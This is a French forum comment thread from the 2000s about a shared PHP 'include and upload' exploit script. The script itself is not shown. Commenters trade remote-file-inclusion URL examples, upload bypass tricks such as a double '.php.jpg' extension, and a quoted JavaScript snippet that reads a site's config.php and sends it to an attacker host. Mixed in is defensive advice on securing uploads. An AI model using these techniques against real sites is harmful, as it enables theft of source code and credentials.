EXPLOI FAILLE INCLUDE & UPLOAD

cs_zzzzzz Messages postés 408 Date d'inscription lundi 16 décembre 2002 Statut Membre Dernière intervention 18 décembre 2012 - 18 avril 2004 à 15:51
Shinikaka Messages postés 4 Date d'inscription dimanche 3 juin 2007 Statut Membre Dernière intervention 2 février 2012 - 2 déc. 2010 à 14:08
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/22045-exploi-faille-include-upload

Shinikaka Messages postés 4 Date d'inscription dimanche 3 juin 2007 Statut Membre Dernière intervention 2 février 2012
2 déc. 2010 à 14:08
Solution la plus efficace pour vous protéger (upload de fichier je parle)
Comme l'a dit renaud288 en 2004 :
- addslashes dans les post et get
- parser le contenu du fichier (pas obligatoire...) pour y trouver un code php

L'ultime solution :
- Renommer le fichier recu en quelque chose . extension obligatoire
exemple :
j'upload script.php
La page qui analyse et traite l'upload le renomme en asdj012.png
TOUJOURS RENOMMER PAR L'EXTENSSION DESIREE ! et voila vous êtes protégé... mais jamais a 100%
Shinikaka Messages postés 4 Date d'inscription dimanche 3 juin 2007 Statut Membre Dernière intervention 2 février 2012
2 déc. 2010 à 14:02
Pour ceux qui ont suivis le sujet de discussion ...
Même si tu n'autorise que des fichier .jpg, ou .png, bref des images, il y a des façons de contourner cette protection.

Les vrais complèterons la suite : nu**b**e ... le truc avec un % :) voyez ?
Je ne voudrais pas être plus explicite.
Si vous savez de quoi je parle, vous n'avez rien a faire ici et connaissez ces méthodes de contournement.
Si vous ne savez pas de quoi je parle, ce script pourrait ne jamais vous être utile, donc vous n'avez rien a faire ici non plus :)
Steph448 Messages postés 1 Date d'inscription samedi 8 août 2009 Statut Membre Dernière intervention 8 août 2009
8 août 2009 à 06:08
xD je ne mis connais pas super bien en ordi, vous pouvez l'expliquer en français san le langage ordi?
NKWolf Messages postés 38 Date d'inscription samedi 28 août 2004 Statut Membre Dernière intervention 11 janvier 2007
4 juin 2006 à 13:11
bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)
NKWolf Messages postés 38 Date d'inscription samedi 28 août 2004 Statut Membre Dernière intervention 11 janvier 2007
4 juin 2006 à 13:11
bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)
cs_guismo1er Messages postés 76 Date d'inscription vendredi 21 mars 2003 Statut Membre Dernière intervention 12 mars 2009
7 avril 2006 à 17:15
avez vous des idées?
cs_guismo1er Messages postés 76 Date d'inscription vendredi 21 mars 2003 Statut Membre Dernière intervention 12 mars 2009
28 mars 2006 à 18:24
Vraiment pas mal cette source, ce serait gentil de nous donner des astuces pour protéger des fichiers lors de l'upload, car ca m'interessrerai bcp :)

Merci à vous :)
alex1025 Messages postés 104 Date d'inscription mardi 17 février 2004 Statut Membre Dernière intervention 8 décembre 2007
12 févr. 2006 à 13:57
si on met un htacces dans le rep ou arrive l image il n'y a plus de soucis non?
kankrelune Messages postés 1293 Date d'inscription mardi 9 novembre 2004 Statut Membre Dernière intervention 21 mai 2015
6 janv. 2005 à 11:24
hé coeur_enf(flammé ça doit etre pour ça... :oD)... .. .

Tu fais comment pour combler une faille de sécurité si t'en entend pas parler... anaha ??? .. . :oP

Et en attendant si tu sais lire la moitié des posteurs on parlés de failles de sécu exploitable sans en donner la façon de l'exploiter... .. .

Et faire un whois de phpcs... mais ça t'avance à quoi... t'a quel age... .. ?

O_o

Il n'y a rien d'illégale dans cette page... va sur les sites de microsoft, de phpnuke, etc... les failles y sont déclarées publiquement dès qu'elles sont trouvées... et heureusement... ça permet de prendre les mesures adéquates pour les combler... .. .

Allez avoue coeur_enf ça t'ennerve parce que tu as peut etre la faille et que personne ici ne donne de code tout fait pour la combler... Alors arrete de pousser mémé dans les orties... .. . ;o)

Pour le reste je serais interessé si quelqu'un à un lien interessant à me conseiller sur la sécurisation du php et sur les points 2, 3 et 4 que vient d'évoquer renaud288... de préference en français si c'est pô trop demander... bien que le site auquel je pense ne présente guere de faille de se genre (le visiteur peut juste lire... pas d'upload, pas de forum et pas encore de guestbook... peut toujours s'accrocher... :oD) ça pourra m'être quand même utile et etre utile à du monde... .. .

^_^

@ tchaOo°
renaud288 Messages postés 8 Date d'inscription jeudi 26 février 2004 Statut Membre Dernière intervention 13 décembre 2004
29 nov. 2004 à 16:55
Petit commentaire rapide. La faille est connue depuis longtemps.... c'est pas une faille PHP...
T'aurais pu être simpa avec les internautes en donnant des données pour résoudre le pb:
1- le problème est à l'upload de fichier via HTML (postage de fichier).
2- Sécuriser la récupération: test de l'extention... (selon le type de serveur (n'oubliez pas les extentions asp etc si votre serveur interprète plusieurs langauges...)
3- parsage du fichier uploadé: contient il du code php, asp etc...
4- ne pas oublier d'ajouter la fonction addslashes a vos données post ou get (il est possible du mettre du code PHP dedans... avec les b ons guillements, les OR et les fonctions php.
5- ne pas déplacer le fichier du rep tmp avant d'être sur
6- effacer le fichier du dossier tmp
7- si votre hébergeur le permet: ne pas mettre le fichier tmp ou équivalent dans la racine... (si les codes du hacker sont bien faits, il peut exécuter le fichier avant qu'il ne soit supprimé de disque
8- Penser aussi à parser d'autres extentions... attention virus, programme de prise de contrôle sur le serveur etc...
Bonne prog à tous et merci aux programmeurs qui mettent en évidence les failles (ou du moins les expliquent aux débutants)
cs_stal Messages postés 2 Date d'inscription lundi 30 août 2004 Statut Membre Dernière intervention 9 septembre 2004
30 août 2004 à 18:27
tu n'as pas un lien de telechargement ?
skotmarud Messages postés 116 Date d'inscription samedi 5 avril 2003 Statut Membre Dernière intervention 26 janvier 2008
19 juin 2004 à 03:25
.txt :X
cs_Kirua Messages postés 3006 Date d'inscription dimanche 14 avril 2002 Statut Membre Dernière intervention 31 décembre 2008
10 juin 2004 à 14:44
extrait du texte de présentation de ce code (que tu n'as pas lu):

Explication finale :
---------------------------------------
La securité avant tout!

alors quoi?
psyjc Messages postés 182 Date d'inscription dimanche 29 juin 2003 Statut Membre Dernière intervention 18 avril 2008
10 juin 2004 à 13:49
Mdrrr!
en attendant tu n'a pas du lire ce que j'ai ecrit plus haut..

bref. j'arrette de perdre du temps sur ce fil..
-=|[titiplusplus]|=- Messages postés 28 Date d'inscription vendredi 7 novembre 2003 Statut Membre Dernière intervention 19 avril 2004
10 juin 2004 à 12:49
loOl ... et apres ?

Pour moi ca incite en rien du tout ce code, mdr.

Tu voulais nous faire partager ta découverte du whois ?

hihihi
cs_ceced Messages postés 70 Date d'inscription lundi 12 mai 2003 Statut Membre Dernière intervention 11 mai 2005
6 juin 2004 à 20:07
coeur_enf j'ai envie de te dire juste vie ta vie, et bosse pour ta geule!
no comment!
psyjc Messages postés 182 Date d'inscription dimanche 29 juin 2003 Statut Membre Dernière intervention 18 avril 2008
6 juin 2004 à 19:13
il y a une (petite) charte juste là, qui dit je cite : "Merci également de veiller à ne pas trop écorcher la langue de molière en écrivant en abrégé (comme sur des SMS)."

alors commence par lire ca, et puis tant que t'y est, tu peux aussi lire les commentaires au dessus avant de dire de la merde...
cs_Kirua Messages postés 3006 Date d'inscription dimanche 14 avril 2002 Statut Membre Dernière intervention 31 décembre 2008
6 juin 2004 à 19:05
ça fait 24h que t'es inscrit sur le site et t'es déjà agressif, éh béh...

ceci dit, suis assez d'accord avec toi sur le fait que ce code porte bien mal ce nom, mais vraiment pas d'accord avec le fait que tu prennes à parti toute la click qui a commenté ici en ayant manifestement pas lu les commentaires.
cs_coeur_enf Messages postés 1 Date d'inscription samedi 5 juin 2004 Statut Membre Dernière intervention 6 juin 2004
6 juin 2004 à 19:03
tu va t'atker a des noob, ki essai d'aprendre le php, et ki on pe de finance

moi je te le dis, atk toi a un mome de 5 an dans la rue, c'est la meme chose !!!!

je rigole kan je vois des bouffon come ca !!!!

je pense ke si vou aviez + de cervel, vou ferriez une explication pour ke les noob sache ce proteger !!!

la je dirai bravo !
pgpp Messages postés 58 Date d'inscription dimanche 16 mai 2004 Statut Membre Dernière intervention 2 septembre 2004
16 mai 2004 à 23:17
salut!
Juste pour dire que je suis d'accord avec koko, il existe une solution plus que simple pour faire exécuter du php via une faille include.
Alors protégez vous bien comme le dit apxa !
apxa Messages postés 188 Date d'inscription mercredi 15 mai 2002 Statut Membre Dernière intervention 25 avril 2009
28 avril 2004 à 10:36
Re salut,
je vais peut etre me repeter mais je pense que si tu veux palier ce genre de faille ,il y a plusieurs solutions :
- soit tu passes par un htaccess avec des controles sur l'host appelant le fichier. (apach only)
- soit tu met php en mode safe on avec des refus d'execution de commandes sensibles (apache ou iis)
- soit tu parses via php le path du fichier afin de recuperer l'host et ainsi comparer avec l'host du serveur pour s'assurer que le fichier executer se trouve bien sur le serveur et non un serveur distant.
- soit tu fais ton site en html et tu fais pas chié le monde avec des failles de newbee (amicalement) ;)
Have Fun.
testetrtr Messages postés 20 Date d'inscription mercredi 14 mai 2003 Statut Membre Dernière intervention 5 juin 2006
27 avril 2004 à 18:41
ok j'ai trouver le prob de la securiter de ce script.
je vais le dire a son proprio.
pour qu'il corrige son script.

pour psyjc (y a quoi comme astuce pour tester la securiter d'un code php , )? astuce comme celle que t'a tester sur ce script.

tu peux me repondre par mail si tu veux.
psyjc Messages postés 182 Date d'inscription dimanche 29 juin 2003 Statut Membre Dernière intervention 18 avril 2008
27 avril 2004 à 18:33
bah va voir sur ton site :)
dans les derniers uploads : testX.php.jpg
execution de code js au travers dimages (sur IE)
tu devrais verifier le type mime en plus de l'extension de fichier avant d'accepter l'upload d'une image.
testetrtr Messages postés 20 Date d'inscription mercredi 14 mai 2003 Statut Membre Dernière intervention 5 juin 2006
27 avril 2004 à 18:25
desolais mais le script d'upload n'est pas de moi.

je l'utilise juste pour dennee des exemple comme ici , c'est tous.

si nan explique ton idee de securite de se script.

c'est tj interessant a savoire.
psyjc Messages postés 182 Date d'inscription dimanche 29 juin 2003 Statut Membre Dernière intervention 18 avril 2008
27 avril 2004 à 16:25
daccord avec testetrtr, la source est bof bof!
mais ton script d'upload aussi ;)
tu devrais revoir la securité de ton upload...
testetrtr Messages postés 20 Date d'inscription mercredi 14 mai 2003 Statut Membre Dernière intervention 5 juin 2006
23 avril 2004 à 18:21
deoler les gas mes cette source n'est pas vraimment ce que je vais califier de exelent .
pour ma note sa cera 3 a 4 sur 10.

pour quoi parceque c'est facile de dree une source plus complette que celle la qui donne l'oportuniter d'uploader sur le serveur que vous avec penetrer . et aussi d'executer des commandes shell et des php.

ce pandant c'est un script qui est lier au pirage , c'est pour ca que je vais vous metre qu'une capture d'ecrant de mon script.

( je l'ai tester sur mon serveur,).

http://lux0r.projektas.lt/do_upload.php
Samiby Messages postés 118 Date d'inscription mercredi 26 novembre 2003 Statut Membre Dernière intervention 2 janvier 2006
19 avril 2004 à 17:28
Ca marche, mais il faut avoir vu le phpinfo() du site, ce qui n'est pas donné à tout le monde
-=|[titiplusplus]|=- Messages postés 28 Date d'inscription vendredi 7 novembre 2003 Statut Membre Dernière intervention 19 avril 2004
19 avril 2004 à 17:22
En tout cas mon truc plus haut marche !

C'est du XSS ( Cross Site Scripting pour ceux qui ne connaissent pas).

Le plus dur est de faire doublecliquer l'admin dessus ... hehe ...

@+
cs_koko Messages postés 654 Date d'inscription lundi 14 janvier 2002 Statut Membre Dernière intervention 20 février 2005
19 avril 2004 à 17:19
faut une faille de type include !
et j'ai pas envie de chercher des failles include sur php nuke...
-=|[titiplusplus]|=- Messages postés 28 Date d'inscription vendredi 7 novembre 2003 Statut Membre Dernière intervention 19 avril 2004
19 avril 2004 à 17:06
hihi ... mdr

>et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment ...

J'adore cette phrase !
Hihihi ...
Hé bien moi je te donne un défis alors !
Pour prouver ta bonne fois je t'authorise à me donner le contenu de mon index.php de mon site loOl.

Voici l'adresse : http://ebc.titiplusplus.com/index.php

Aller sans rancune ;-)
cs_Kirua Messages postés 3006 Date d'inscription dimanche 14 avril 2002 Statut Membre Dernière intervention 31 décembre 2008
19 avril 2004 à 16:58
ce n'est pas une faille, c'est une imprudence. les créateurs de PHP ne sont pas raisonnable de la connerie des gens. qd tu laisses au visiteur la possibilité de placer ses fichiers personnels sur ton serveur FTP, tu prends tes dispositions, basta. je trouve qu'on ne peut pas appeler ça une faille.
Samiby Messages postés 118 Date d'inscription mercredi 26 novembre 2003 Statut Membre Dernière intervention 2 janvier 2006
19 avril 2004 à 16:42
Il y a déjà eu des imbéciles qui ne surveillent pas l'upload sur leur site ?
Il faut être vraiment débile.
C'est sûr que à partir du moment où tu peux uploader n'importe quel fichier chez quelqu'un, tu peux faire n'importe quoi.
cs_koko Messages postés 654 Date d'inscription lundi 14 janvier 2002 Statut Membre Dernière intervention 20 février 2005
19 avril 2004 à 16:31
alors je vais expliquer (pas la faille mais bon)

il y a un site qui n'est pas a moi (on va dire phpcs pour que vous compreniez mais il n'y a pas cette faille)

si je fais :
http://www.phpcs.com/include.php?page=http://monsite/script.php

et que dans include.php il y ai : include($_GET['page']);

la page script.php sera exécutée comme du php !!!

MAIS ca ne marchera pas a la base si vous utilisez un serveur apache par exemple.
Car le php est interpreté coté serveur
donc la page sera exécutée sur monsite !!
MAIS BIS il y a moyen que le code soit exécuter sur le serveur phpcs !!!

et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment, je veux pas que des gamins s'amusent avec ca...
apxa Messages postés 188 Date d'inscription mercredi 15 mai 2002 Statut Membre Dernière intervention 25 avril 2009
19 avril 2004 à 11:30
salut,
c pas une faille mais je dirais plutot un mauvais parametrage de php.ini.
il suffit de mettre php en mode safe et le tour est joue.
sans compté que php.ini permet le refus de certaine commandes dites "sensibles" telque system() ou readfile().
ceci dit comme d'hab la majorité des hacking est souvent du a une mauvaise administration du site, de même pour un developpement.
Have Fun
-=|[titiplusplus]|=- Messages postés 28 Date d'inscription vendredi 7 novembre 2003 Statut Membre Dernière intervention 19 avril 2004
19 avril 2004 à 10:52
Le full patch que j'écris ... loOl ... mdr ... non excusez-moi ... hihi ... c pas le "full patch" mais le "fullpath".
-=|[titiplusplus]|=- Messages postés 28 Date d'inscription vendredi 7 novembre 2003 Statut Membre Dernière intervention 19 avril 2004
19 avril 2004 à 10:48
Après ma petite enquête ... tout le monde à raison.
Et donc, koko aussi !!!
Juste que koko a oublié de préciser que le fichier malveillant doit être visualisé par l'admin du site en local !
En plus pour écrire ce script il doit avoir le full patch du fichier dont il veut la source :-P

Voici l'extrait de http://www.phpsecure.info/v2/article/Phpinfo-Security.php :

Si on a le path complet et que le webmaster visite une page contenant ce script :
---------------------------------------------------------------------------
<script>
dafile=window.open('/home/httpd/public_html/config.php');
window.open('http://[attacker]/file.php?'+dafile.document.body.innerText);
</script>
---------------------------------------------------------------------------
depuis l'ordinateur dans lequel se trouve le site, il renverra la source du fichier config.php au fichier
http://[attacker]/file.php, qui enregistrera l'information d'une façon ou d'une autre.


Voilou ;-)
cs_ceced Messages postés 70 Date d'inscription lundi 12 mai 2003 Statut Membre Dernière intervention 11 mai 2005
19 avril 2004 à 10:14
tu peu obtenire les sources php sachant que php est invisible en affichant la source!

qd tu affiches la source dans un navigateur tu lis que l'html, rien d'autre!

relie la doc php :) (baseeeee)
cs_ceced Messages postés 70 Date d'inscription lundi 12 mai 2003 Statut Membre Dernière intervention 11 mai 2005
19 avril 2004 à 10:10
la faille et a l'upload garcon! (include), peut etre que tu trouvera le fichier, cofing.inc.php, mais tu pouras pas le lire, et si t arrive a uploadé mon fichier, t'obitendra les codes, (si y a pas d'otre faille), mais c'est une faille que bcp utilise surement! croi moi lol c belle et bien une faille!


bin si non dit moi comment tu recupere un code sans une source de cette maniere...

Y A PLusieur faille comme script kiddi, ect... mais celle ci ne fait pas parti d'un script kiddi :) (comme on l appelle)
Samiby Messages postés 118 Date d'inscription mercredi 26 novembre 2003 Statut Membre Dernière intervention 2 janvier 2006
19 avril 2004 à 10:04
Maids donc, où est la faille ? Tu ne peux rien obtenir par ce code, si ce n'est ce que tu as en faisant 'afficher la source' dans ton navigateur.
cs_ceced Messages postés 70 Date d'inscription lundi 12 mai 2003 Statut Membre Dernière intervention 11 mai 2005
19 avril 2004 à 09:56
Mais evidement sinon php serai interdit!
Samiby Messages postés 118 Date d'inscription mercredi 26 novembre 2003 Statut Membre Dernière intervention 2 janvier 2006
19 avril 2004 à 09:54
de tout de façon, qui n'a pas le code d'accès au FTP, n'as le droit de lire les fichiers. Il ne peut les lire qu'au travers du navigateur, sous forme de HTML. il me semble que les fichiers sont protégés contre la lecture non autorisée chez tous les hébergeurs.
cs_ceced Messages postés 70 Date d'inscription lundi 12 mai 2003 Statut Membre Dernière intervention 11 mai 2005
19 avril 2004 à 09:51
http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

1. KOKO SI TU ARRIVE TU AS DETRUIT PHP,
2.http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php a la limite tu peu fair un script java script pour recuperation ou volé les cookies c'est tous! mais pas executé un script coté distant !
-=|[titiplusplus]|=- Messages postés 28 Date d'inscription vendredi 7 novembre 2003 Statut Membre Dernière intervention 19 avril 2004
19 avril 2004 à 08:38
hé koko je viens de réaliser un truc la ...

http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

Là le résultat sera uniquement au mieux du html !!!

Tu ne peux pas avoir la source d'un php distant comme ca !
A moins de configurer tonsite.com comme il faut pour le faire !!!

Et ca c'est plutot utopique, non ?
-=|[titiplusplus]|=- Messages postés 28 Date d'inscription vendredi 7 novembre 2003 Statut Membre Dernière intervention 19 avril 2004
19 avril 2004 à 08:34
oui mais en général sur chez un hébergeur, on a seulement accès son répertoire et non celui des autres ... le seule moyen d'utiliser ce script reste de trouver un site qui authorise l'upload sauvage ... hihi.
Et ce qui serait intéressant c'est de rechercher la racine du site :
<?
ex :
$dir='.';
while (is_dir($dir))
{
$dir.='../';
}
?>

Ou un truc dans le genre ...
cs_koko Messages postés 654 Date d'inscription lundi 14 janvier 2002 Statut Membre Dernière intervention 20 février 2005
19 avril 2004 à 08:11
mais alors l'utilité de cette source si le webmaster prend ses dispositions ?

c'était juste que je disais qu'il y avait comme meme moyen de le faire :)
cs_Kirua Messages postés 3006 Date d'inscription dimanche 14 avril 2002 Statut Membre Dernière intervention 31 décembre 2008
19 avril 2004 à 07:39
bah Koko, y a pas moyen si le webmaster prend ses dispositions, voilà tout. C'est comme ça pour tous les points sensibles :-)
cs_koko Messages postés 654 Date d'inscription lundi 14 janvier 2002 Statut Membre Dernière intervention 20 février 2005
19 avril 2004 à 07:34
http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

il y a moyen tout de meme ^^

mais je dirais pas comment
cs_ceced Messages postés 70 Date d'inscription lundi 12 mai 2003 Statut Membre Dernière intervention 11 mai 2005
19 avril 2004 à 00:14
Le principe est simple, cela marche seulement coté serveur, et comme tous le monde sais, il faut, réussir, a uploader se fichier, pour recuperer les login et passe grace a ce script ...(cela peut etre sql, lhost, ftp, ect..) Donc en gros, si le webmaster n'a pas securisé l'upload de fichier en surveillant les extentions, .php, ou autre, risque et perile pour lui!

Donc si tu sais ou le fichier de la source que j ai mi se trouve, il te fau tous simplement, executé le script, cad: http://www.victime.com/photos/code.php

enfait on s'est tous que les pages, config.inc.php ou autre dont la majorité utilise le nom de c page, dedans se trouve les connexions, cad, host, pass, login d'autre par tu sais que tu ne peu pas executé se script comme http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

ca ne marchera pas et si ca marcherai il n'y aurai plus du php :p...!

J'ai essayé pour wanadoo car wanadoo a une faille enorme fo l'exploité, je ne la donnerai pas ici...

VOILA le but de se script et de lire toute les source extention php dans tous les rep/

de plus il t enregistre sous le nom code.own donc t source des pages recupéré par le script tu peux soi les telecharger, soi les voir directement via l 'url (voir lien show source) possibilité d affiché les code en couleur

Voir aussi fonction showsource("page") si tu veu t amusé...

Voilou..
cs_zzzzzz Messages postés 408 Date d'inscription lundi 16 décembre 2002 Statut Membre Dernière intervention 18 décembre 2012
18 avril 2004 à 23:04
Par contre tu pourrai détailler le principe de l'exploit car je n'ai pas comprit le principe (:p) merci.
cs_ceced Messages postés 70 Date d'inscription lundi 12 mai 2003 Statut Membre Dernière intervention 11 mai 2005
18 avril 2004 à 22:21
merci bien, lol, mais le but qd meme et pour dir la securité avant tout!
et tempis pour se qu'ils ont cette faille et qu'il ne la securise pas! faute du webmaster et non de la faille...
OverDarck Messages postés 116 Date d'inscription jeudi 12 juillet 2001 Statut Membre Dernière intervention 23 juin 2005
18 avril 2004 à 19:59
Tout simplement exelent, d'une simplicitée certaine, mais d'une puissance extraordinaire !!!!
Merci bien !
cs_zzzzzz Messages postés 408 Date d'inscription lundi 16 décembre 2002 Statut Membre Dernière intervention 18 décembre 2012
18 avril 2004 à 15:51
Qui a mit 1/10 ? n'importe quoi c'est pas prk c marqué exploit qu'il faut marquer directement 1/10. moi je te remercie pour ta source et je met 10/10 por compenser, @+
Rejoignez-nous